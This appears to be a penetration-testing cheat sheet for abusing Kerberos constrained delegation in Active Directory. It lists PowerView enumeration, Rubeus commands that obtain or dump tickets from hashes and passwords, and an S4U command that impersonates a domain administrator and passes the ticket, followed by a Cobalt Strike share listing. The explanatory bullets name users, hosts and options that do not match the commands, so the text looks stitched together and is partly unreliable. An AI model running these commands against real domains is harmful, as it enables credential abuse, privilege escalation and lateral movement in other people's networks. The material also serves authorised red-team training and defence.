Constrained Delegation

Constrained delegation was soon released as a safer means for services to perform Kerberos delegation. It aims to restrict the services to which the server can act on behalf of a user. It no longer allows the server to cache the TGTs of other users, but allows it to request a TGS for another user with its own TGT.

# Verify
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Generate TGT Ticket With User Credentials
Rubeus.exe asktgt /user:workstation1$ /rc4:<NTLM Hash>
Rubeus.exe asktgt /user:sqlservice /password:P@ssw0rd

# Generate TGT Ticket With User Session OR Dumping
Rubeus.exe tgtdeleg
Rubeus.exe triage
Rubeus.exe dump

# Command
Rubeus.exe s4u /impersonateuser:administrator /msdsspn:time/workstation1.marvel.local /altservice:cifs /opsec /ptt /ticket:<TICKET> 

beacon> ls \\wkstn-2.dev.cyberbotic.io\c$

• /impersonateuser is the user we want to impersonate. nlamb is a domain admin but you want to ensure this user has local admin access to the target (WKSTN-2).

• /msdsspn is the service principal name that SRV-2 is allowed to delegate to.

• /user is the principal allowed to perform the delegation.

• /aes256 is the AES256 key of the /user.

• /opsec tells Rubeus to more closely mimic genuine S4U2Self and S4U2Proxy requests (can only be used with aes256).

• /ptt tells Rubeus to pass the generated tickets directly into the current logon session.